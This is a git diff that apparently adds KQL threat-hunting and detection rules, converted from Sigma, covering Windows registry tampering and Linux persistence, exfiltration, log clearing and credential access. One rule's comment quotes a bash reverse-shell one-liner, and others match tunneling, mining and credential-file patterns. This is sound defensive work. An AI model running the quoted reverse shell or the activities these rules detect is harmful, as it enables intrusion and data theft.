+| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (not(RegistryKey endswith "\\MRUList")) and (not(((RegistryValueData in~ ("%appdata%\\1", "%localappdata%\\1", "%public%\\1", "%temp%\\1", "calc\\1", "dxdiag\\1", "explorer\\1", "gpedit.msc\\1", "mmc\\1", "notepad\\1", "regedit\\1", "services.msc\\1", "winver\\1")) or RegistryValueData contains "ping")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql
new file mode 100644
index 00000000..30f4e16c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Office Trusted Location Updated
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: medium
+// Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
+// False Positives:
+//   - During office installations or setup, trusted locations are added, which will trigger this rule.
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
new file mode 100644
index 00000000..241b830e
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
@@ -0,0 +1,14 @@
+// Title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace.
+// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
+// These can be used for example in decrypting malicious payload for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting
+// False Positives:
+//   - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Shell\\Open\\Command" and (RegistryValueData contains ".AesCryptoServiceProvider" or RegistryValueData contains ".DESCryptoServiceProvider" or RegistryValueData contains ".DSACryptoServiceProvider" or RegistryValueData contains ".RC2CryptoServiceProvider" or RegistryValueData contains ".Rijndael" or RegistryValueData contains ".RSACryptoServiceProvider" or RegistryValueData contains ".TripleDESCryptoServiceProvider") and (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryValueData contains "System.Security.Cryptography."
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql
new file mode 100644
index 00000000..0a47b1af
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql
@@ -0,0 +1,13 @@
+// Title: Service Binary in User Controlled Folder
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-05-02
+// Level: medium
+// Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
+// Attackers often use such directories for staging purposes.
+// This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
+// Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\AppData\\Roaming\\") and (RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\ImagePath") and (not((RegistryValueData contains "C:\\ProgramData\\Microsoft\\Windows Defender\\" and (RegistryKey endswith "\\Services\\WinDefend*" or RegistryKey contains "\\Services\\MpKs")))) and (not((((RegistryValueData contains "C:\\Users\\" and RegistryValueData contains "AppData\\Local\\Temp\\MBAMInstallerService.exe") and RegistryKey contains "\\Services\\MBAMInstallerService") or (RegistryValueData contains "C:\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe" and RegistryKey contains "\\Services\\ZoomCptService"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql
new file mode 100644
index 00000000..f6442fe9
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql
@@ -0,0 +1,12 @@
+// Title: Shell Context Menu Command Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-06
+// Level: low
+// Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.threat-hunting
+// False Positives:
+//   - Likely from new software installation suggesting to add context menu items. Such as "PowerShell", "Everything", "Git", etc.
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Classes*" and RegistryKey endswith "\\shell*" and RegistryKey endswith "\\command*"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql b/KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql
new file mode 100644
index 00000000..03d91df4
--- /dev/null
+++ b/KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Linux Doas Conf File Creation
+// Author: Sittikorn S, Teoderick Contreras
+// Date: 2022-01-20
+// Level: medium
+// Description: Detects the creation of doas.conf file in linux host platform.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "/etc/doas.conf"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/persistence_via_cron_files.kql b/KQL/rules/linux/file_event/persistence_via_cron_files.kql
new file mode 100644
index 00000000..67bbd623
--- /dev/null
+++ b/KQL/rules/linux/file_event/persistence_via_cron_files.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via Cron Files
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: medium
+// Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003
+// False Positives:
+//   - Any legitimate cron file.
+
+DeviceFileEvents
+| where (FolderPath startswith "/etc/cron.d/" or FolderPath startswith "/etc/cron.daily/" or FolderPath startswith "/etc/cron.hourly/" or FolderPath startswith "/etc/cron.monthly/" or FolderPath startswith "/etc/cron.weekly/" or FolderPath startswith "/var/spool/cron/crontabs/") or (FolderPath contains "/etc/cron.allow" or FolderPath contains "/etc/cron.deny" or FolderPath contains "/etc/crontab")
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/persistence_via_sudoers_files.kql b/KQL/rules/linux/file_event/persistence_via_sudoers_files.kql
new file mode 100644
index 00000000..ec5d0c5b
--- /dev/null
+++ b/KQL/rules/linux/file_event/persistence_via_sudoers_files.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via Sudoers Files
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: medium
+// Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003
+// False Positives:
+//   - Creation of legitimate files in sudoers.d folder part of administrator work
+
+DeviceFileEvents
+| where FolderPath startswith "/etc/sudoers.d/"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql b/KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql
new file mode 100644
index 00000000..70d9d6b1
--- /dev/null
+++ b/KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Shell Script Creation in Profile Folder
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects the creation of shell scripts under the "profile.d" path.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
+//   - Regular file creation during system update or software installation by the package manager
+
+DeviceFileEvents
+| where FolderPath contains "/etc/profile.d/" and (FolderPath endswith ".csh" or FolderPath endswith ".sh")
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql b/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql
new file mode 100644
index 00000000..dcacdacf
--- /dev/null
+++ b/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Filename with Embedded Base64 Commands
+// Author: @kostastsale
+// Date: 2025-11-22
+// Level: high
+// Description: Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.
+// These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.defense-evasion, attack.t1027
+// False Positives:
+//   - Legitimate files with similar naming patterns (very unlikely).
+
+DeviceFileEvents
+| where FolderPath contains "{echo" or FolderPath contains "{base64,-d}"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql
new file mode 100644
index 00000000..38fa4642
--- /dev/null
+++ b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Default LockFile
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath =~ "/tmp/rootlog"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql
new file mode 100644
index 00000000..7d60d5c1
--- /dev/null
+++ b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Default Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.defense-evasion, attack.t1053.003
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "ebpfbackdoor"
\ No newline at end of file
diff --git a/KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql b/KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql
new file mode 100644
index 00000000..269ff083
--- /dev/null
+++ b/KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql
@@ -0,0 +1,12 @@
+// Title: Wget Creating Files in Tmp Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Legitimate downloads of files in the tmp folder.
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "/wget" and (FolderPath startswith "/tmp/" or FolderPath startswith "/var/tmp/")
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql
new file mode 100644
index 00000000..47020b41
--- /dev/null
+++ b/KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql
@@ -0,0 +1,14 @@
+// Title: Communication To LocaltoNet Tunneling Service Initiated - Linux
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-06-17
+// Level: high
+// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
+// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
+// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
+// False Positives:
+//   - Legitimate use of the LocaltoNet service.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com"
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql b/KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql
new file mode 100644
index 00000000..e3a2d96c
--- /dev/null
+++ b/KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql
@@ -0,0 +1,12 @@
+// Title: Communication To Ngrok Tunneling Service - Linux
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-03
+// Level: high
+// Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
+// False Positives:
+//   - Legitimate use of ngrok
+
+DeviceNetworkEvents
+| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com"
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql b/KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql
new file mode 100644
index 00000000..d12702fd
--- /dev/null
+++ b/KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql
@@ -0,0 +1,12 @@
+// Title: Linux Crypto Mining Pool Connections
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects process connections to a Monero crypto mining pool
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+//   - Legitimate use of crypto miners
+
+DeviceNetworkEvents
+| where RemoteUrl in~ ("pool.minexmr.com", "fr.minexmr.com", "de.minexmr.com", "sg.minexmr.com", "ca.minexmr.com", "us-west.minexmr.com", "pool.supportxmr.com", "mine.c3pool.com", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-asia1.nanopool.org", "xmr-jp1.nanopool.org", "xmr-au1.nanopool.org", "xmr.2miners.com", "xmr.hashcity.org", "xmr.f2pool.com", "xmrpool.eu", "pool.hashvault.pro", "moneroocean.stream", "monerocean.stream")
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql b/KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql
new file mode 100644
index 00000000..d8967000
--- /dev/null
+++ b/KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql
@@ -0,0 +1,10 @@
+// Title: Linux Reverse Shell Indicator
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-16
+// Level: critical
+// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "/bin/bash" and (not((RemoteIP in~ ("127.0.0.1", "0.0.0.0"))))
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql
new file mode 100644
index 00000000..b0f448d3
--- /dev/null
+++ b/KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Malware Callback Communication - Linux
+// Author: hasselj
+// Date: 2024-05-10
+// Level: high
+// Description: Detects programs that connect to known malware callback ports based on threat intelligence reports.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("888", "999", "2200", "2222", "4000", "4444", "6789", "8531", "50501", "51820")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql b/KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql
new file mode 100644
index 00000000..c8a07206
--- /dev/null
+++ b/KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql
@@ -0,0 +1,12 @@
+// Title: Access of Sudoers File Content
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /etc/sudoers" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/egrep" or FolderPath endswith "/emacs" or FolderPath endswith "/fgrep" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql b/KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql
new file mode 100644
index 00000000..09580819
--- /dev/null
+++ b/KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql
@@ -0,0 +1,14 @@
+// Title: Audit Rules Deleted Via Auditctl
+// Author: Mohamed LAKRI
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
+// This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
+// Removal of audit rules can significantly impair detection of malicious activities on the affected system.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.012
+// False Positives:
+//   - An administrator troubleshooting. Investigate all attempts.
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "-D" and FolderPath endswith "/auditctl"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/bash_interactive_shell.kql b/KQL/rules/linux/process_creation/bash_interactive_shell.kql
new file mode 100644
index 00000000..48f6a90f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/bash_interactive_shell.kql
@@ -0,0 +1,10 @@
+// Title: Bash Interactive Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: low
+// Description: Detects execution of the bash shell with the interactive flag "-i".
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -i " and FolderPath endswith "/bash"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql b/KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql
new file mode 100644
index 00000000..c7b1deda
--- /dev/null
+++ b/KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql
@@ -0,0 +1,12 @@
+// Title: BPFtrace Unsafe Option Usage
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2022-02-11
+// Level: medium
+// Description: Detects the usage of the unsafe bpftrace option
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+// False Positives:
+//   - Legitimate usage of the unsafe option
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--unsafe" and FolderPath endswith "bpftrace"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
new file mode 100644
index 00000000..d661373c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
@@ -0,0 +1,10 @@
+// Title: Capabilities Discovery - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: low
+// Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -r " and FolderPath endswith "/getcap"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql b/KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql
new file mode 100644
index 00000000..9dff2a13
--- /dev/null
+++ b/KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql
@@ -0,0 +1,10 @@
+// Title: Capsh Shell Invocation - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "capsh" utility to invoke a shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith " --" and FolderPath endswith "/capsh"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/chmod_suspicious_directory.kql b/KQL/rules/linux/process_creation/chmod_suspicious_directory.kql
new file mode 100644
index 00000000..12946f6c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/chmod_suspicious_directory.kql
@@ -0,0 +1,12 @@
+// Title: Chmod Suspicious Directory
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-03
+// Level: medium
+// Description: Detects chmod targeting files in abnormal directory paths.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.002
+// False Positives:
+//   - Admin changing file permissions.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/.Library/" or ProcessCommandLine contains "/etc/" or ProcessCommandLine contains "/opt/") and FolderPath endswith "/chmod"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/clear_linux_logs.kql b/KQL/rules/linux/process_creation/clear_linux_logs.kql
new file mode 100644
index 00000000..b7eb3b14
--- /dev/null
+++ b/KQL/rules/linux/process_creation/clear_linux_logs.kql
@@ -0,0 +1,12 @@
+// Title: Clear Linux Logs
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/var/log" or ProcessCommandLine contains "/var/spool/mail") and (FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql b/KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql
new file mode 100644
index 00000000..4d252f98
--- /dev/null
+++ b/KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql
@@ -0,0 +1,13 @@
+// Title: Clipboard Collection with Xclip Tool
+// Author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: low
+// Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.
+// Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+// False Positives:
+//   - Legitimate usage of xclip tools.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-sel" and ProcessCommandLine contains "clip" and ProcessCommandLine contains "-o") and FolderPath contains "xclip"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/connection_proxy.kql b/KQL/rules/linux/process_creation/connection_proxy.kql
new file mode 100644
index 00000000..2581351e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/connection_proxy.kql
@@ -0,0 +1,12 @@
+// Title: Connection Proxy
+// Author: Ömer Günal
+// Date: 2020-06-17
+// Level: low
+// Description: Detects setting proxy configuration
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "http_proxy=" or ProcessCommandLine contains "https_proxy="
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql b/KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql
new file mode 100644
index 00000000..450e7d9c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql
@@ -0,0 +1,13 @@
+// Title: Container Residence Discovery Via Proc Virtual FS
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+//   - Legitimate system administrator usage of these commands
+//   - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where (FolderPath endswith "awk" or FolderPath endswith "/cat" or FolderPath endswith "grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nl" or FolderPath endswith "/tail") and (ProcessCommandLine contains "/proc/2/" or (ProcessCommandLine contains "/proc/" and (ProcessCommandLine endswith "/cgroup" or ProcessCommandLine endswith "/sched")))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql b/KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql
new file mode 100644
index 00000000..8bd804dd
--- /dev/null
+++ b/KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql
@@ -0,0 +1,10 @@
+// Title: Copy Passwd Or Shadow From TMP Path
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-31
+// Level: high
+// Description: Detects when the file "passwd" or "shadow" is copied from tmp path
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "passwd" or ProcessCommandLine contains "shadow") and FolderPath endswith "/cp" and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/crontab_enumeration.kql b/KQL/rules/linux/process_creation/crontab_enumeration.kql
new file mode 100644
index 00000000..a5d0476b
--- /dev/null
+++ b/KQL/rules/linux/process_creation/crontab_enumeration.kql
@@ -0,0 +1,12 @@
+// Title: Crontab Enumeration
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects usage of crontab to list the tasks of the user
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007
+// False Positives:
+//   - Legitimate use of crontab
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -l" and FolderPath endswith "/crontab"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/curl_usage_on_linux.kql b/KQL/rules/linux/process_creation/curl_usage_on_linux.kql
new file mode 100644
index 00000000..b8b7fd60
